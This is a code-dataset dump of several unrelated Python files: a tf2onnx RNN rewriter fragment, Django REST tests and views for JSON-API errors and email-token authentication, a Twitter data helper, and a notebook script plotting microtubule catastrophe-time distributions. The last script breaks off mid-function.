blacklist_inputs.extend(var_init_nodes)\n\n return blacklist_inputs\n\n def find_inputs(self, rnn_scope_name, rnn_props, match, input_blacklist=None):\n rnn_input_nodes = []\n for n in self.g.get_nodes():\n if n.name.startswith(rnn_scope_name):\n # find input node that are not within rnn scope\n for input_id, input_node in zip(n.input, n.inputs):\n if not input_node.name.startswith(rnn_scope_name):\n if input_node not in input_blacklist:\n rnn_input_nodes.append([input_node, input_id])\n\n if len(rnn_input_nodes) != 1:\n log.debug(\"found %d inputs for the dynamic_run, unexpected. They are %s\",\n len(rnn_input_nodes), rnn_input_nodes)\n return rnn_props\n\n input_node_candidate = rnn_input_nodes[0][0]\n input_id_candidate = rnn_input_nodes[0][1]\n\n # we should not limit the rnn_input_nodes' type be Placeholder or Const,\n # because there might some Reshape/etc. ops after the Placeholder\n rnn_props.input_node = input_node_candidate\n rnn_props.input_id = input_id_candidate\n return rnn_props\n\n# process found info according to ONNX requirement\n def process_input_x(self, rnn_props, rnn_scope_name):\n self.print_step(\"look for possible transpose following RNN input node\")\n # todo: peepholdes P is not considered now\n input_consumers = self.g.find_output_consumers(rnn_props.input_id)\n consumers_in_rnn_scope = []\n for consumer in input_consumers:\n if consumer.name.startswith(rnn_scope_name):\n consumers_in_rnn_scope.append(consumer)\n\n if len(consumers_in_rnn_scope) != 1:\n log.warning(\"RNN input node has %d onsumers in current rnn scope %s skip\",\n len(consumers_in_rnn_scope), rnn_scope_name)\n return None\n\n possible_transpose_after_input = consumers_in_rnn_scope[0]\n\n self.print_step(\"convert the transpose to onnx node if there is one found.\")\n # check whether time_major is enabled or not\n # in TF, if time_major is not enabled, input format is [batch, time, ...]\n # but, during TF handling, at the beginning, the data will be transposed to [time, batch, ...]\n # after processing, the format is changed back before returning result.\n # So here, we judge the time_major by checking the transpose operator existence.\n converted_transpose = self._convert_timemajor_transpose(possible_transpose_after_input)\n if converted_transpose:\n log.debug(\"detect batch-major inputs\")\n rnn_props.time_major = False\n rnn_props.x_input_id = converted_transpose.output[0]\n self.all_nodes.extend([converted_transpose])\n else:\n log.debug(\"detect timer-major inputs\")\n rnn_props.time_major = True\n rnn_props.x_input_id = rnn_props.input_id\n\n rnn_props.onnx_input_ids[\"X\"] = rnn_props.x_input_id\n return rnn_props\n\n def process_weights_and_bias(self, rnn_weights, rnn_props):\n pass\n\n def process_var_init_nodes(self, rnn_props):\n pass\n\n def process_seq_length(self, rnn_props, seq_length_node):\n # output: [time step, batch size, input size]\n shape_node = self.g.make_node(\"Shape\", [rnn_props.x_input_id])\n\n # LSTMCell only allow inputs of [batch size, input_size], so we assume dynamic_rnn has 3 dims.\n # Slice cannot support Int64 in OPSET 7, so we cast here.\n cast_shape_node = self.g.make_node(\"Cast\", [shape_node.output[0]],\n attr={\"to\": onnx_pb.TensorProto.FLOAT},\n shapes=[self.g.get_shape(shape_node.output[0])])\n\n batchsize_node = self.g.make_node(\"Slice\", [cast_shape_node.output[0]],\n attr={\"axes\": [0], \"starts\": [1], \"ends\": [2]})\n\n # Tile's repeats must be INT64\n repeat_node = self.g.make_node(\"Cast\", [batchsize_node.output[0]],\n attr={\"to\": onnx_pb.TensorProto.INT64})\n\n self.all_nodes.extend([shape_node, cast_shape_node, batchsize_node, repeat_node])\n\n if not seq_length_node:\n timestep_node = self.g.make_node(\"Slice\", [cast_shape_node.output[0]],\n attr={\"axes\": [0], \"starts\": [0], \"ends\": [1]})\n\n tile_node = self.g.make_node(\"Tile\", [timestep_node.output[0], repeat_node.output[0]])\n\n # LSTM sequence_lens needs to be int32\n seq_length_node = self.g.make_node('Cast', [tile_node.output[0]],\n attr={\"to\": onnx_pb.TensorProto.INT32})\n\n self.all_nodes.extend([timestep_node, tile_node, seq_length_node])\n\n rnn_props.onnx_input_ids[\"sequence_lens\"] = seq_length_node.output[0]\n return seq_length_node, batchsize_node\n\n def process_outputs(self, match, rnn_node, rnn_props, rnn_scope_name):\n # There are 2 kinds of output nodes for dynamic_rnn\n # 1. output node, which ends with \"Exit\" followed\n # either Transpose (when time_major is False),\n # or TensorArrayGather\n # 2. cell_state node,\n # 2.1 if state_is_tuple is true:\n # 2.1.1 which ends with \"Exit\" followed by a Pack whose name is out of rnn scope.\n # 2.1.2 which ends with \"Exit\" for c and h respectively, when cell_state.c/h is used.\n # 2.2 which ends with \"Exit\" if state_is_tuple is false\n for n in self.g.get_nodes():\n if n.type == \"Exit\" and n.name.startswith(rnn_scope_name):\n if len(n.input) != 1:\n raise ValueError(\"exit's input count is \" + str(len(n.input)) + \" instead of 1\")\n switch = n.inputs[0]\n if switch.type != \"Switch\":\n log.debug(\"Exit has non-Switch input, skip.\")\n continue\n\n for var_name, funcs in self.switch_checkers.items():\n var_checker = funcs[0]\n var_exit_connector = funcs[1]\n\n enter_target_input_id = self.check_switch_by_usage_pattern(switch, match, var_checker)\n if enter_target_input_id:\n log.debug(\"this is %s exit node\", var_name)\n var_exit_connector(rnn_node, n, rnn_props)\n break\n\n def create_rnn_node(self, rnn_props):\n pass\n\n# helper function\n def check_switch_by_usage_pattern(self, switch_node, match, check_func):\n if switch_node.type != 'Switch':\n return None\n\n # the first input is data\n merge_node = switch_node.inputs[0]\n if merge_node.type != \"Merge\":\n return None\n\n target_node_input_id = None\n for merge_input in merge_node.inputs:\n if merge_input.type == 'Enter':\n target_node_input_id = merge_input.input[0]\n log.debug(\"a Switch >> Merge >> Enter is found called %s\", merge_input.inputs[0].name)\n break\n else:\n log.debug(\"skip the non-Enter input node of the merge_node\")\n continue\n\n # check whether it is c_initialize or h_initialize\n if target_node_input_id:\n switch_consumers = self.g.find_output_consumers(switch_node.output[1])\n assert len(switch_consumers) == 1\n if switch_consumers[0].type == \"Identity\":\n identity_consumers = self.g.find_output_consumers(switch_consumers[0].output[0])\n return check_func(target_node_input_id, identity_consumers, match)\n log.error(\"not expected, skip \")\n log.warning(\"is_switch_used_by found no merge>>Enter node\")\n\n return None\n\n @staticmethod\n def print_step(level_2, level_1=\"find_dynamic_run_unit\"):\n log.debug(level_1 + \" >> \" + level_2)\n\n def _workaround_fill_ch_init_node(self, initializer_input_id, rnn_props):\n node = self.g.get_node_by_output(initializer_input_id)\n if node.type != \"Fill\":\n return None\n\n fill_val = node.inputs[1].get_tensor_value()[0]\n fill_val_dtype = utils.ONNX_TO_NUMPY_DTYPE[node.inputs[1].dtype]\n\n # this must be int64, since Concat's input data type must be consistent.\n num_direction_node = self.g.make_const(utils.make_name(\"Const\"), np.array([1], dtype=np.float32))\n h_node = self.g.make_const(utils.make_name(\"Const\"), np.array([rnn_props.hidden_size], dtype=np.float32))\n b_node = rnn_props.batch_size_node\n # Concat in OPSET7 does not support int64.\n tile_shape = self.g.make_node(\"Concat\", [num_direction_node.output[0], b_node.output[0], h_node.output[0]],\n attr={\"axis\": 0})\n\n # Tile's repeats must be INT64\n attr = {\"to\": onnx_pb.TensorProto.INT64}\n tile_shape_int64 = self.g.make_node(\"Cast\", [tile_shape.output[0]], attr)\n\n const_node = self.g.make_const(utils.make_name(\"Const\"), np.array([[[fill_val]]], dtype=fill_val_dtype))\n tile_node = self.g.make_node(\"Tile\", [const_node.output[0], tile_shape_int64.output[0]])\n self.all_nodes.extend([tile_shape, tile_shape_int64, tile_node])\n return tile_node\n\n def _convert_timemajor_transpose(self, node):\n if not check_is_timemajor_transpose(node):\n log.debug(\"not found timemajor transpose\")\n return None\n\n log.debug(\"found timemajor transpose\")\n\n attr = {\"perm\": np.array([1, 0, 2], dtype=np.int64)}\n new_trans = self.g.make_node(\"Transpose\", [node.input[0]], attr=attr,\n shapes=[self.g.get_shape(node.output[0])],\n dtypes=[self.g.get_dtype(node.input[0])])\n self.g.replace_all_inputs(self.g.get_nodes(), node.output[0], new_trans.output[0])\n return new_trans\n","sub_path":"tf2onnx/rewriter/unit_rewriter_base.py","file_name":"unit_rewriter_base.py","file_ext":"py","file_size_in_byte":20614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"84352101","text":"from __future__ import absolute_import\nimport unittest\nimport numpy as n\nfrom polyxsim import check_input\n\nclass test_input(unittest.TestCase):\n def test_reading(self): ## test method names begin 'test*'\n myinput = check_input.parse_input(input_file='simul.inp')\n myinput.read()\n def test_checking(self):\n myinput = check_input.parse_input(input_file='simul.inp')\n myinput.read()\n myinput.check()\n def test_initialize(self):\n myinput = check_input.parse_input(input_file='simul.inp')\n myinput.read()\n myinput.check()\n myinput.initialize()\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/test_input.py","file_name":"test_input.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"224897513","text":"# coding: utf-8\n\nfrom datetime import datetime\nimport json\nfrom os.path import abspath, dirname, exists, join, realpath\n\nfrom twitter import Status, User\n\n\nHERE = abspath(dirname(realpath(__file__)))\nFLAGS = {\n 'AF': '🇦🇫',\n 'AR': '🇦🇷',\n 'AU': '🇦🇺',\n 'BR': '🇧🇷',\n 'CA': '🇨🇦',\n 'CN': '🇨🇳',\n 'DE': '🇩🇪',\n 'EU': '🇪🇺',\n 'FR': '🇫🇷',\n 'IN': '🇮🇳',\n 'ID': '🇮🇩',\n 'IR': '🇮🇷',\n 'IL': '🇮🇱',\n 'IT': '🇮🇹',\n 'JP': '🇯🇵',\n 'KR': '🇰🇷',\n 'MX': '🇲🇽',\n 'NL': '🇳🇱',\n 'PK': '🇵🇰',\n 'RU': '🇷🇺',\n 'SA': '🇸🇦',\n 'TR': '🇹🇷',\n 'UK': '🇬🇧',\n 'UN': '🇺🇳',\n 'US': '🇺🇸',\n 'ZA': '🇿🇦',\n}\n\n\nclass Account(object):\n def __init__(self, name, twitter_handler, country_representing, role, is_personal, verified):\n self.name = name\n self.twitter_handler = twitter_handler\n self.country_representing = country_representing\n self.role = role\n self.is_personal = is_personal\n self.verified = verified\n self.followings = []\n self.tweets = []\n self.fetch_timestamp = None\n self.filename = join(HERE, 'data', 'account-%s.json' % self.twitter_handler)\n\n def save(self):\n data = {\n 'followings': [f._json for f in self.followings],\n 'tweets': [t._json for t in self.tweets],\n 'fetch_timestamp': self.fetch_timestamp,\n }\n with open(self.filename, 'w') as outfile:\n json.dump(data, outfile, sort_keys=True, indent=1, separators=(',', ': '))\n\n def load(self):\n if not exists(self.filename):\n return False\n with open(self.filename, 'r') as infile:\n data = json.load(infile)\n self.followings = [User.NewFromJsonDict(f) for f in data['followings']]\n self.tweets = [Status.NewFromJsonDict(t) for t in data['tweets']]\n self.fetch_timestamp = data['fetch_timestamp']\n return self.fetch_timestamp is not None\n\n def fetch(self, api, from_internet_even_if_local_exists=False, save=True):\n if from_internet_even_if_local_exists or not self.load():\n self.followings = api.GetFriends(screen_name=self.twitter_handler)\n self.tweets = api.GetUserTimeline(screen_name=self.twitter_handler, count=200)\n self.fetch_timestamp = str(datetime.now())\n if save:\n self.save()\n return True\n return False\n\n def __str__(self):\n text = self.name or self.twitter_handler\n if self.country_representing in FLAGS:\n text += ' ' + FLAGS[self.country_representing]\n return text\n\n def verbose_title(self):\n text = self.name or self.twitter_handler\n if self.verified:\n text += '✔︎'\n if self.country_representing in FLAGS:\n text += \" (\"\n if self.role:\n text += self.role + \" of \"\n text += self.country_representing + ' ' + FLAGS[self.country_representing] + \")\"\n return text\n","sub_path":"twitter_helper.py","file_name":"twitter_helper.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"66042486","text":"\"\"\"Test error response renderer\"\"\"\n\nfrom django.core.urlresolvers import reverse\nfrom rest_framework.relations import HyperlinkedRelatedField\nfrom rest_framework.serializers import ValidationError\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom tests import models\nfrom tests.serializers import PersonSerializer\nfrom tests.utils import dump_json\nfrom tests.views import PersonViewSet\n\nimport pytest\nimport rest_framework\n\npytestmark = pytest.mark.django_db\n\n# \"Invalid hyperlink - object does not exist.\" - DRF 2.x\n# \"Invalid hyperlink - Object does not exist.\" - DRF 3.x\n# Both wrapped in a proxy class that needs to be unproxied\n# in order to serialized to JSON\ndoes_not_exist = (\n HyperlinkedRelatedField.default_error_messages['does_not_exist']\n .encode('utf-8').decode('utf-8'))\n\n\ndef test_required_field_omitted(client):\n data = {}\n data_json_api = dump_json({\"people\": data})\n\n response = client.post(\n reverse(\"person-list\"), data=data_json_api,\n content_type=\"application/vnd.api+json\")\n\n assert response.status_code == 400, response.content\n assert not models.Person.objects.exists()\n\n result_data = {\"name\": [\"This field is required.\"]}\n assert response.data == result_data\n\n results = {\n \"errors\": [{\n \"path\": \"/name\",\n \"detail\": \"This field is required.\",\n \"status\": \"400\"\n }]\n }\n\n assert response.content == dump_json(results)\n\n\ndef test_auth_required(rf):\n class RestrictedPersonViewSet(PersonViewSet):\n permission_classes = [IsAuthenticated]\n\n data = dump_json({\"people\": {\"name\": \"Jason Api\"}})\n\n request = rf.post(\n reverse(\"person-list\"), data=data,\n content_type=\"application/vnd.api+json\")\n view = RestrictedPersonViewSet.as_view({'post': 'create'})\n response = view(request)\n response.render()\n\n assert response.status_code == 403, response.content\n assert not models.Person.objects.exists()\n\n results = {\n \"errors\": [{\n \"status\": \"403\",\n \"title\": \"Authentication credentials were not provided.\"\n }]\n }\n assert response.content == dump_json(results)\n\n\ndef test_drf_non_field_validation_error(rf):\n '''DRF uses 'non_field_errors' as the key for non-field errors'''\n class LazyPersonSerializer(PersonSerializer):\n def validate(self, attr):\n raise ValidationError(\"Feeling lazy. Try again later.\")\n\n class LazyPersonViewSet(PersonViewSet):\n serializer_class = LazyPersonSerializer\n\n data = dump_json({\"people\": {\"name\": \"Jason Api\"}})\n\n request = rf.post(\n reverse(\"person-list\"), data=data,\n content_type=\"application/vnd.api+json\")\n view = LazyPersonViewSet.as_view({'post': 'create'})\n response = view(request)\n response.render()\n\n assert response.status_code == 400, response.content\n assert not models.Person.objects.exists()\n\n results = {\n \"errors\": [{\n \"status\": \"400\",\n \"path\": \"/-\",\n \"detail\": \"Feeling lazy. Try again later.\"\n }]\n }\n assert response.content == dump_json(results)\n\n\n@pytest.mark.skipif(\n rest_framework.__version__.split(\".\")[0] >= \"3\",\n reason=\"DRF 3+ no longer calls model.clean\",\n)\ndef test_django_non_field_validation_error(rf, monkeypatch):\n '''Django uses __all__ as the key for non-field errors\n\n Constant is django.core.exceptions.NON_FIELD_ERRORS\n '''\n def clean(self):\n raise ValidationError(\"I'm not taking any new people today\")\n\n monkeypatch.setattr(models.Person, 'clean', clean)\n data = dump_json({\"people\": {\"name\": \"Jason Api\"}})\n\n request = rf.post(\n reverse(\"person-list\"), data=data,\n content_type=\"application/vnd.api+json\")\n view = PersonViewSet.as_view({'post': 'create'})\n response = view(request)\n response.render()\n\n assert response.status_code == 400, response.content\n assert not models.Person.objects.exists()\n\n results = {\n \"errors\": [{\n \"status\": \"400\",\n \"path\": \"/-\",\n \"detail\": \"I'm not taking any new people today\"\n }]\n }\n assert response.content == dump_json(results)\n\n\ndef test_invalid_forward_relation(client):\n assert not models.Person.objects.exists()\n\n data = dump_json({\n \"posts\": {\n \"title\": \"This is the title\",\n \"author\": \"http://testserver/people/1/\",\n \"comments\": [],\n }\n })\n\n response = client.post(\n reverse(\"post-list\"), data=data,\n content_type=\"application/vnd.api+json\")\n\n assert response.status_code == 400, response.content\n assert response['content-type'] == 'application/vnd.api+json'\n assert not models.Post.objects.exists()\n\n results = {\n \"errors\": [{\n \"status\": \"400\",\n \"path\": \"/author\",\n \"detail\": does_not_exist\n }]\n }\n\n assert response.content == dump_json(results)\n\n\ndef test_invalid_reverse_relation(client):\n author = models.Person.objects.create(name=\"The Author\")\n assert not models.Comment.objects.exists()\n data = dump_json({\n \"posts\": {\n \"title\": \"This is the title\",\n \"author\": \"http://testserver/people/%d/\" % author.pk,\n \"comments\": [\"http://testserver/comments/1/\"]\n }\n })\n\n response = client.post(\n reverse(\"post-list\"), data=data,\n content_type=\"application/vnd.api+json\")\n\n assert response.status_code == 400, response.content\n assert response['content-type'] == 'application/vnd.api+json'\n\n results = {\n \"errors\": [{\n \"status\": \"400\",\n \"path\": \"/comments\",\n \"detail\": does_not_exist\n }]\n }\n\n assert response.content == dump_json(results)\n\n\ndef test_bad_json(client):\n data = \"{'people': {'name': 'Jason Api'}}\" # Wrong quotes\n\n response = client.post(\n reverse(\"person-list\"), data=data,\n content_type=\"application/vnd.api+json\")\n\n assert response.status_code == 400, response.content\n assert response['content-type'] == 'application/vnd.api+json'\n\n results = {\n \"errors\": [{\n \"status\": \"400\",\n \"detail\": (\n \"JSON parse error - Expecting property name enclosed in\"\n \" double quotes: line 1 column 2 (char 1)\"),\n }]\n }\n assert response.content == dump_json(results)\n","sub_path":"tests/test_errors.py","file_name":"test_errors.py","file_ext":"py","file_size_in_byte":6412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"157746018","text":"from django.test import TestCase\n\nfrom api.v1.tests.factories import ClientFactory, ClientAccountFactory, ExternalAssetFactory, \\\n RegionFactory, AddressFactory, RiskProfileGroupFactory, \\\n AccountTypeRiskProfileGroupFactory, GroupFactory, UserFactory, \\\n GoalFactory\nfrom main.constants import ACCOUNT_TYPE_PERSONAL\nfrom common.constants import GROUP_SUPPORT_STAFF\n\n\nclass ClientTests(TestCase):\n def setUp(self):\n self.support_group = GroupFactory(name=GROUP_SUPPORT_STAFF)\n # client with some personal assets, cash balance and goals\n self.region = RegionFactory.create()\n self.betasmartz_client_address = AddressFactory(region=self.region)\n self.risk_group = RiskProfileGroupFactory.create(name='Personal Risk Profile Group')\n self.personal_account_type = AccountTypeRiskProfileGroupFactory.create(account_type=0,\n risk_profile_group=self.risk_group)\n self.user = UserFactory.create()\n self.betasmartz_client = ClientFactory.create(user=self.user)\n\n self.betasmartz_client_account = ClientAccountFactory(primary_owner=self.betasmartz_client, account_type=ACCOUNT_TYPE_PERSONAL)\n self.external_asset1 = ExternalAssetFactory.create(owner=self.betasmartz_client)\n self.external_asset2 = ExternalAssetFactory.create(owner=self.betasmartz_client)\n\n self.goal1 = GoalFactory.create(account=self.betasmartz_client_account)\n self.goal2 = GoalFactory.create(account=self.betasmartz_client_account)\n\n self.betasmartz_client2 = ClientFactory.create()\n\n def tearDown(self):\n self.client.logout()\n\n # Tests below this validate the client model's internal functionality\n # they do not test api endpoints\n def test_net_worth(self):\n \"\"\"\n verify that the client's net worth property returns the expected\n amount for the client's assets\n \"\"\"\n assets_sum = self.external_asset1.get_growth_valuation() + self.external_asset2.get_growth_valuation()\n # a clientaccount with a cash balance and some goals\n accounts_sum = 0.0\n accounts_sum += self.betasmartz_client_account.cash_balance\n for goal in self.betasmartz_client_account.goals:\n accounts_sum += goal.cash_balance\n expected_net_worth = float(assets_sum) + accounts_sum\n self.assertAlmostEqual(self.betasmartz_client.net_worth, expected_net_worth)\n\n # expecting client.net_worth using @property to have cached this initial result\n # lets make sure the underlying client._net_worth() function is tracking the right info\n # ok, let's add to the cash balance and check again\n self.betasmartz_client_account.cash_balance += 2000.0\n self.betasmartz_client_account.save()\n expected_net_worth += 2000.0\n self.assertAlmostEqual(self.betasmartz_client._net_worth(), expected_net_worth)\n","sub_path":"client/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"373030933","text":"from django.urls import path, include\nimport core.views as core_views\nimport zinc.views as zinc_views\n\nurlpatterns = [\n path(r\"api///\", zinc_views.api_object),\n path(r\"api/pdbs/\", zinc_views.PdbViewSet.as_view({\"get\": \"list\"})),\n path(r\"api/sites/\", zinc_views.ZincSiteViewSet.as_view({\"get\": \"list\"})),\n path(r\"api/chain-clusters/\", zinc_views.ChainClusterViewSet.as_view({\"get\": \"list\"})),\n path(r\"api/site-clusters/\", zinc_views.ZincSiteClusterViewSet.as_view({\"get\": \"list\"})),\n path(r\"api/search\", zinc_views.PdbSearchResults.as_view({\"get\": \"list\"})),\n path(r\"api/search/\", zinc_views.PdbSearchResults.as_view({\"get\": \"list\"})),\n path(r\"api/\", zinc_views.api),\n path(r\"search\", zinc_views.search),\n path(r\"search/\", zinc_views.search),\n path(r\"data/\", core_views.data),\n path(r\"data/all/\", core_views.all_data),\n path(r\"about/\", core_views.about),\n path(r\"help/\", core_views.help),\n path(r\"changelog/\", core_views.changelog),\n path(r\"pdbs//\", zinc_views.pdb),\n path(r\"/\", zinc_views.zinc_site),\n path(r\"\", core_views.home),\n]\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"181832112","text":"from django.contrib.auth.tokens import default_token_generator\nfrom django.core.mail import send_mail\nfrom django.http import JsonResponse\nfrom django.conf import settings\nfrom django.shortcuts import get_object_or_404\n\nfrom rest_framework_simplejwt.serializers import User\nfrom rest_framework.decorators import action, api_view\nfrom rest_framework_simplejwt.tokens import AccessToken\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework import viewsets\nfrom rest_framework import filters\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom .serializer import UserSerializer, EmailSerializer\nfrom .models import User\nfrom .permissions import IsAdministrator\n\n\n@api_view(['POST'])\ndef email(request):\n \"\"\"Send confirmation_code by email.\"\"\"\n email = request.POST['email']\n serializer = EmailSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = User.objects.get_or_create(\n username=email, email=email, is_active=False)[0]\n confirmation_code = default_token_generator.make_token(user)\n send_mail('Подтверждение регистрации',\n f'Пожалуйста, сохраните этот код : {confirmation_code},'\n ' он Вам понадобиться для получения токена',\n settings.EMAIL_ADDRESS,\n [email], fail_silently=False)\n return JsonResponse(serializer.validated_data)\n\n\n@api_view(['POST'])\ndef get_token(request):\n \"\"\"Generate access token.\"\"\"\n email = request.POST['email']\n serializer = EmailSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n confirmation_code = request.POST['confirmation_code']\n user = get_object_or_404(User, email=email)\n if default_token_generator.check_token(user, confirmation_code):\n user.is_active = True\n user.save()\n token = AccessToken.for_user(user)\n return JsonResponse({'token': str(token)})\n return Response({\"message\": \"confirmation_code или email не верны\"},\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n filter_backends = [filters.SearchFilter]\n search_fields = ['username', ]\n lookup_field = 'username'\n permission_classes = [IsAuthenticated, IsAdministrator]\n\n @action(\n detail=False,\n methods=['get', 'patch'],\n permission_classes=[IsAuthenticated]\n )\n def me(self, request):\n user = User.objects.filter(username=request.user)[0]\n if request.method == 'GET':\n serializer = self.get_serializer(user)\n return Response(serializer.data)\n if request.method == 'PATCH':\n serializer = self.get_serializer(\n user, data=request.data, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data,\n status=status.HTTP_200_OK)\n","sub_path":"auth_user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"362115487","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.3'\n# jupytext_version: 0.8.6\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n\"\"\"\ncode to generate Figure 2, which \nexplores what different values of beta1 and beta2 affect\nthe catastrophe times the two-arrival story.\nAlso has a plot of brentq roots for MLE of beta1 / beta2\n\"\"\"\n\n# +\nimport os, sys, subprocess\n\nimport tidy_data\n\nimport pandas as pd\nimport numpy as np\n\nimport scipy.stats\nimport iqplot\n\nimport panel as pn\n\nimport bokeh.io\nbokeh.io.output_notebook()\npn.extension()\n\ndata_path = \"../data/\"\n# -\n\ndef _create_df_for_dashboard():\n \"\"\"\n create a dataframe of various values of beta1 and beta2\n and the corresponding time to catastrophe.\n Modeled by a joint exponential distribution that is added together\n \n Inputs:\n None\n Outputs:\n df\n \n Notes: This is not user-facing, since we use it for plotting the dashboard\n that explores varying values of beta1 and beta2\n \"\"\"\n # set possible values for beta1 and beta2\n # recall these are rates, so beta1s[2] corresponds to 1 per 100 seconds\n beta1s = [1,1/30,1/100,1/300,1/1000,1/3000]\n beta2s = [1,1/30,1/100,1/300,1/1000,1/3000]\n\n # make an empty ndarray to store our samples\n samples = np.ndarray((0,3))\n \n rg = np.random.default_rng()\n \n for i, beta1 in enumerate(beta1s):\n for j, beta2 in enumerate(beta2s):\n\n # draw times; numpy takes 1/beta for the scale\n t1 = rg.exponential(1/beta1, size=150)\n t2 = rg.exponential(1/beta2, size=150)\n\n catast_t = [(t1[k] + t2[k], beta1, beta2) for k in range(len(t1))]\n\n # store the samples\n samples = np.concatenate((samples, catast_t))\n\n # move samples into a dataframe\n df = pd.DataFrame(data=samples, columns=['time to catastrophe (s)','beta1','beta2'])\n return df\n\ndef _extract_sub_df(df, beta1, beta2):\n \"\"\"\n Pulls data from df corresponding to the chosen beta1 and beta2.\n \"\"\"\n \n inds = (\n np.isclose(df[\"beta1\"], beta1)\n & np.isclose(df[\"beta2\"], beta2)\n )\n \n return df.loc[inds, :]\n\ndef plot_ecdf(df, beta1, beta2):\n \"\"\"\n Dashboarding.\n Generates the ECDF for the chosen beta1 and beta2.\n \"\"\"\n \n sub_df = _extract_sub_df(df, beta1, beta2)\n \n return iqplot.ecdf(data=sub_df, q=\"time to catastrophe (s)\")\n\n# +\n# uncomment to use code\ndf = _create_df_for_dashboard()\n\nbeta1_slider = pn.widgets.DiscreteSlider(\n name='beta1',\n options=list(df[\"beta1\"].unique()),\n value = 1.0\n)\n\nbeta2_slider = pn.widgets.DiscreteSlider(\n name='beta2',\n options=list(df[\"beta2\"].unique()),\n value = 1.0\n)\n\n# Make the ECDF depend on the selected values of beta1 and beta2\n\n@pn.depends(\n beta1=beta1_slider.param.value, \n beta2=beta2_slider.param.value\n)\ndef plot_ecdf_pn(beta1, beta2):\n return plot_ecdf(df, beta1, beta2)\n# -\n\ndef _draw_model(beta_1, beta_2, size=1):\n \"\"\"\n draw out of two exponential distributions\n parametrized by beta_1 and beta_2\n \"\"\"\n rg = np.random.default_rng()\n return rg.exponential(1/beta_1, size=size) + rg.exponential(1/beta_2, size=size)\n\n# +\ndef plot_beta_ratios_ecdf():\n \"\"\"\n different expected catastrophe times for different ratios of beta1/beta2;\n ratio range of [0.1, 0.3, 1, 3, 10]\n Inputs:\n None\n Outputs:\n Bokeh figure\n \"\"\"\n n_samples = 150\n p = None\n\n p = bokeh.plotting.figure(\n frame_height=300,\n frame_width=450,\n x_axis_label=\"time to catastrophe × β₁\",\n y_axis_label=\"ECDF\",\n )\n\n beta_ratio = [0.1, 0.3, 1, 3, 10]\n\n catastrophe_times = np.concatenate(\n [_draw_model(1, br, size=n_samples) for br in beta_ratio]\n )\n beta_ratios = np.concatenate([[br] * n_samples for br in beta_ratio])\n df = pd.DataFrame(\n data={\"β₂/β₁\": beta_ratios, \"time to catastrophe × β₁\": catastrophe_times}\n )\n\n p = iqplot.ecdf(\n df,\n q=\"time to catastrophe × β₁\",\n cats=\"β₂/β₁\",\n palette=bokeh.palettes.Magma7[1:-1][::-1],\n )\n p.legend.title = \"β₂/β₁\"\n p.title.text = 'β₂/β₁ ratio effect on joint exponential distribution'\n return p\n\n#to use, uncomment this\n# p = plot_beta_ratios_ecdf()\n# bokeh.io.show(p)\n# -\n\ndef _dl_ddb(beta_1, times_to_catastrophe):\n \"\"\"\n coding up d(ell)/db\n \"\"\"\n t_bar = times_to_catastrophe.mean()\n n = len(times_to_catastrophe)\n delta_beta = beta_1 * (t_bar * beta_1 - 2) / (1 - t_bar * beta_1)\n tmp1 = n / (beta_1 + delta_beta)\n tmp2 = n / delta_beta\n tmp3 = np.sum(\n times_to_catastrophe * np.exp(-delta_beta * times_to_catastrophe) / (1 - np.exp(-delta_beta * times_to_catastrophe))\n )\n return tmp1 - tmp2 + tmp3\n\n# +\ndef plot_brentq_roots():\n \"\"\"\n plot the derivative of the log likelihood with respect to\n delta beta, as parametrized by beta_1, to see where\n the roots are. Plotted over values of beta_1 (0.003, 0.008)\n \n Inputs:\n None\n Outputs:\n bokeh figure\n \"\"\"\n \n df = tidy_data.tidy_dic()\n \n #Labelled data\n labeled_data = df.loc[df['labeled'] == True, 'time to catastrophe (s)']\n\n #convert to ndarray\n times_to_catastrophe = labeled_data.to_numpy()\n\n beta1_array = np.linspace(.003, .008, 1000)\n dl = [_dl_ddb(beta1, times_to_catastrophe) for beta1 in beta1_array]\n dl = np.array(dl)\n \n # Create the figure, stored in variable `p`\n p = bokeh.plotting.figure(\n width=400,\n height=300,\n x_axis_label=\"various values of beta1\",\n y_axis_label=\"log likelihood dl/delta_beta\",\n title = 'roots where beta1 maximizes mle',\n )\n p.line(\n beta1_array,\n dl,\n x=\"beta1\",\n y=\"dl/beta1\"\n )\n return p\n\n#uncomment to run\n# p = plot_brentq_roots()\n# bokeh.io.show(p)\n\n# +\ndef main():\n# # uncomment to use code\n# df = _create_df_for_dashboard()\n\n# beta1_slider = pn.widgets.DiscreteSlider(\n# name='beta1',\n# options=list(df[\"beta1\"].unique()),\n# value = 1.0\n# )\n\n# beta2_slider = pn.widgets.DiscreteSlider(\n# name='beta2',\n# options=list(df[\"beta2\"].unique()),\n# value = 1.0\n# )\n# # to use, uncomment out this code\n# widgets = pn.Column(pn.Spacer(height=30), beta1_slider, beta2_slider, 